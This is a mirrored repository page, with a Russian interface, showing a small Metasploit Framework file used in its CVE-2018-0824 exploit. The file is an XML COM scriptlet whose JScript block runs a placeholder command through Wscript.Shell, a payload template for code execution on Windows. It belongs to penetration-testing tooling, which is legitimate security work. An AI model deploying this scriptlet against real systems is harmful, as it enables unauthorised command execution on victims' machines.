/
githubmirror
/
metasploit-framework
Обзор
Документация
Войти
/
githubmirror
/
metasploit-framework
Код
Запросы
0
Пакеты
0
Релизы
0
Аналитика
Безопасность
master
data/exploits/CVE-2018-0824/script_template
16 строк
306 B
bwatters-r7
Get everything together finally (still needs cleanup)
20 окт 2018, 02:15
20 окт 2018, 02:15
4735355
Код
Авторство
О чём код?
<?xml version='1.0'?> <package> <component id='giffile'> <registration description='Dummy' progid='giffile' version='1.00' remotable='True'> </registration> <script language='JScript'> <![CDATA[ var q = new ActiveXObject('Wscript.Shell').Run("SCRIPTED_COMMAND"); ]]> </script> </component> </package>